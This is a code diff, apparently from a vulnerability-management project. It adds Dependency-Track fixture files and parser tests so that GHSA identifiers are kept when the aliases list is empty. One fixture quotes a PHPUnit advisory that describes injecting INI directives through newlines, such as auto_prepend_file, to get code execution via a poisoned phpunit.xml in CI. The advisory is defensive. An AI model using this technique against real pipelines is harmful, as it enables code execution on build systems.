+                "vulnId": "GHSA-qrr6-mg7r-m243",
+                "aliases": [],
+                "references": "* [https://github.com/sebastianbergmann/phpunit/security/advisories/GHSA-qrr6-mg7r-m243](https://github.com/sebastianbergmann/phpunit/security/advisories/GHSA-qrr6-mg7r-m243)\n* [https://github.com/sebastianbergmann/phpunit/pull/6592](https://github.com/sebastianbergmann/phpunit/pull/6592)\n* [https://github.com/advisories/GHSA-qrr6-mg7r-m243](https://github.com/advisories/GHSA-qrr6-mg7r-m243)",
+                "cweId": 88,
+                "description": "## Impact\n\nPHPUnit forwards PHP INI settings to child processes (used for isolated/PHPT test execution) as `-d name=value` command-line arguments without neutralizing INI metacharacters. Because PHP's INI parser interprets `\"` as a string delimiter, `;` as the start of a comment, and most importantly a newline as a directive separator, a value containing a newline is parsed by the child process as multiple INI directives.\n\nAn attacker able to influence a single INI value can therefore inject arbitrary additional directives into the child's configuration, including `auto_prepend_file`, `extension`, `disable_functions`, `open_basedir`, and others. Setting `auto_prepend_file` to an attacker-controlled path yields remote code execution in the child process.\n\nSources of INI values that participate in the attack:\n\n- `<ini name=\"\u2026\" value=\"\u2026\"/>` entries in `phpunit.xml` / `phpunit.xml.dist`\n- INI settings inherited from the host PHP runtime via `ini_get_all()`\n\n### Threat Model\n\nExploitation requires the attacker to control the content of an INI value read by PHPUnit. In practice this means write access to the project's `phpunit.xml`, the host `php.ini`, or the PHP binary's environment. The most realistic exposure is [Poisoned Pipeline Execution](https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution) (PPE): a pull request from an untrusted contributor that modifies `phpunit.xml` to include a newline-containing INI value, executed by a CI system that runs PHPUnit against the PR without isolation. A malicious newline is not visibly distinguishable from a legitimate value in a typical diff review.\n\n### Affected component\n\n`PHPUnit\\Util\\PHP\\JobRunner::settingsToParameters()`.\n\n## Patches\n\nThe fix has two parts:\n\n**1. Reject line-break characters**\n\nBecause a newline or carriage return in an INI value has no legitimate use and is the primitive that enables directive injection, any PHP setting value containing `\\n` or `\\r` is now rejected with an explicit `PhpProcessException`. This follows the same \"visibility over silence\" principle applied in [CVE-2026-24765](https://github.com/sebastianbergmann/phpunit/security/advisories/GHSA-vvj3-c3rp-c85p): the anomalous state fails loudly in CI output rather than being silently sanitized, giving operators an opportunity to investigate whether it reflects tampering, environment contamination, or an unexpected upstream change.\n\n**2. Quote remaining metacharacters**\n\nValues containing `\"` or `;`, both of which have legitimate uses (e.g., regex-valued INI settings such as `ddtrace`'s `datadog.appsec.obfuscation_parameter_value_regexp`), are wrapped in double quotes with inner `\"` escaped as `\\\"`, so PHP's INI parser reads them as literal string contents rather than comment/delimiter tokens. Plain values are forwarded unchanged so that boolean keywords (`On`/`Off`) and bitwise expressions (`E_ALL & ~E_NOTICE`) retain their INI semantics.\n\n## Workarounds\n\nIf upgrading is not immediately possible:\n\n- Audit INI values: Ensure no `<ini value=\"\u2026\">` entry in `phpunit.xml` / `phpunit.xml.dist` contains newline, `\"`, or `;` characters, and that nothing writes such values into configuration at build time.\n- Isolate CI execution of untrusted code: Run PHPUnit against pull requests only in ephemeral, containerized runners that discard filesystem state between jobs; require human review before executing PRs from forks; enforce branch protection on workflows that handle secrets (`pull_request_target` and similar). These mitigations apply to the broader PPE risk class and are effective against this vulnerability as well.\n- Restrict who can modify `phpunit.xml`: Treat `phpunit.xml` as security-sensitive in code review, particularly `<ini>` entries.\n- Sanitize host INI: Ensure the host PHP's `php.ini` does not contain values with embedded newlines or unescaped metacharacters.\n\n## References\n\n- Fix: https://github.com/sebastianbergmann/phpunit/pull/6592\n- Related advisory (same threat class, Poisoned Pipeline Execution): [GHSA-vvj3-c3rp-c85p / CVE-2026-24765](https://github.com/sebastianbergmann/phpunit/security/advisories/GHSA-vvj3-c3rp-c85p)\n- OWASP CI/CD Top 10: [CICD-SEC-04 Poisoned Pipeline Execution](https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution)\n- CWE-88: https://cwe.mitre.org/data/definitions/88.html\n- CWE-93: https://cwe.mitre.org/data/definitions/93.html",
+                "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
+                "source": "GITHUB",
+                "published": "2026-04-18 00:59:28.0",
+                "title": "PHPUnit has Argument injection via newline in PHP INI values that are forwarded to child processes",
+                "cwes": [
+                    {
+                        "cweId": 88,
+                        "name": "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')"
+                    },
+                    {
+                        "cweId": 93,
+                        "name": "Improper Neutralization of CRLF Sequences ('CRLF Injection')"
+                    }
+                ],
+                "uuid": "b36da30c-0bbf-444f-9de8-da5b4f62257f",
+                "severityRank": 1,
+                "cweName": "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')"
+            },
+            "matrix": "ca4f2da9-0fad-4a13-92d7-f627f3168a57:ba890e8c-91ed-4b2c-bed2-ea5c3ddf8eac:b36da30c-0bbf-444f-9de8-da5b4f62257f",
+            "analysis": {
+                "isSuppressed": false
+            }
+        }
+    ],
+    "project": {
+        "name": "acme/acme-app (php)",
+        "purl": "pkg:composer/acme/acme-app@application",
+        "uuid": "ca4f2da9-0fad-4a13-92d7-f627f3168a57",
+        "version": "develop"
+    },
+    "version": "1.3"
+}

--- a/unittests/scans/dependency_track/one_finding_ghsa_empty_aliases.json
+++ b/unittests/scans/dependency_track/one_finding_ghsa_empty_aliases.json
@@ -1,0 +1,43 @@
+{
+  "version": "1.3",
+  "meta": {
+    "application": "Dependency-Track",
+    "version": "4.11.0",
+    "timestamp": "2026-04-23T10:24:15Z",
+    "baseUrl": "http://dtrack.example.org"
+  },
+  "project": {
+    "uuid": "b758afce-558b-4967-92ad-5618d8ec605b",
+    "name": "Example",
+    "version": "1.0"
+  },
+  "findings": [
+    {
+      "component": {
+        "latestVersion": "14.0.0",
+        "scope": "REQUIRED",
+        "name": "uuid",
+        "project": "b758afce-558b-4967-92ad-5618d8ec605b",
+        "purl": "pkg:npm/uuid@8.3.2",
+        "uuid": "febfdec4-1e5e-4c27-ab3d-b8e22cddf316",
+        "version": "8.3.2"
+      },
+      "attribution": {
+        "analyzerIdentity": "INTERNAL_ANALYZER",
+        "attributedOn": "2026-04-23 10:24:15.586"
+      },
+      "vulnerability": {
+        "severity": "MEDIUM",
+        "source": "GITHUB",
+        "vulnId": "GHSA-w5hq-g745-h8pq",
+        "aliases": [],
+        "cweId": 787,
+        "description": "uuid v3/v5/v6 accept external output buffers but do not reject out-of-range writes."
+      },
+      "analysis": {
+        "isSuppressed": false
+      },
+      "matrix": "b758afce-558b-4967-92ad-5618d8ec605b:febfdec4-1e5e-4c27-ab3d-b8e22cddf316:ghsa-w5hq-g745-h8pq"
+    }
+  ]
+}

--- a/unittests/tools/test_dependency_track_parser.py
+++ b/unittests/tools/test_dependency_track_parser.py
@@ -39,8 +39,8 @@ class TestDependencyTrackParser(DojoTestCase):
             findings = parser.get_findings(testfile, Test())
             self.assertEqual(4, len(findings))
 
-            self.assertIsNone(findings[0].unsaved_vulnerability_ids)
-            self.assertIsNone(findings[1].unsaved_vulnerability_ids)
+            self.assertIn("533", findings[0].unsaved_vulnerability_ids)
+            self.assertIn("48", findings[1].unsaved_vulnerability_ids)
             self.assertEqual(1, len(findings[2].unsaved_vulnerability_ids))
             self.assertEqual("CVE-2016-2097", findings[2].unsaved_vulnerability_ids[0])
             self.assertEqual("8d7f5fcd-210b-491d-a29e-904c2e01b281:3e52f829-3317-48c3-bde1-342c610bd223:900991f6-335a-49cb-9bf6-87b545f960ce", findings[2].unique_id_from_tool)
@@ -110,6 +110,42 @@ class TestDependencyTrackParser(DojoTestCase):
 
             self.assertEqual(12, len(findings))
             self.assertIn("CVE-2022-2053", findings[11].unsaved_vulnerability_ids)
+
+    def test_dependency_track_parser_npm_4_14_1(self):
+        with (
+            get_unit_tests_scans_path("dependency_track") / "deptrack_npm_4.14.1.json").open(encoding="utf-8",
+        ) as testfile:
+            parser = DependencyTrackParser()
+            findings = parser.get_findings(testfile, Test())
+            self.assertEqual(22, len(findings))
+            # findings with GITHUB source and empty aliases should still have their GHSA id captured
+            self.assertIn("GHSA-q4gf-8mx6-v5v3", findings[4].unsaved_vulnerability_ids)
+            self.assertIn("GHSA-w5hq-g745-h8pq", findings[16].unsaved_vulnerability_ids)
+            # findings with aliases should include both the vulnId and alias ids
+            self.assertIn("GHSA-3p68-rc4w-qgx5", findings[2].unsaved_vulnerability_ids)
+            self.assertIn("CVE-2025-62718", findings[2].unsaved_vulnerability_ids)
+
+    def test_dependency_track_parser_php_4_14_1(self):
+        with (
+            get_unit_tests_scans_path("dependency_track") / "deptrack_php_4.14.1.json").open(encoding="utf-8",
+        ) as testfile:
+            parser = DependencyTrackParser()
+            findings = parser.get_findings(testfile, Test())
+            self.assertEqual(13, len(findings))
+            # finding with GITHUB source and empty aliases should still have its GHSA id captured
+            self.assertIn("GHSA-qrr6-mg7r-m243", findings[12].unsaved_vulnerability_ids)
+            # findings with aliases should include both the vulnId and alias ids
+            self.assertIn("GHSA-4486-gxhx-5mg7", findings[0].unsaved_vulnerability_ids)
+            self.assertIn("CVE-2026-25129", findings[0].unsaved_vulnerability_ids)
+
+    def test_dependency_track_parser_ghsa_vulnid_with_empty_aliases(self):
+        with (
+            get_unit_tests_scans_path("dependency_track") / "one_finding_ghsa_empty_aliases.json").open(encoding="utf-8",
+        ) as testfile:
+            parser = DependencyTrackParser()
+            findings = parser.get_findings(testfile, Test())
+            self.assertEqual(1, len(findings))
+            self.assertIn("GHSA-w5hq-g745-h8pq", findings[0].unsaved_vulnerability_ids)
 
     def test_dependency_track_parser_findings_with_cvssV3_score(self):
         with (get_unit_tests_scans_path("dependency_track") / "many_findings_with_cvssV3_score.json").open(encoding="utf-8") as testfile:


### PR DESCRIPTION
## Summary

- Fixes #14745: findings from Dependency Track with an empty `aliases` list were silently dropping the `vulnId` (e.g. `GHSA-w5hq-g745-h8pq`) because the old code only set the vulnerability ID when `source == "NVD"`

This was basically old code trying to set the CVE field which then seemingly got renamed in the code.

Add some real world new sample data as some of the existing samples looked really old.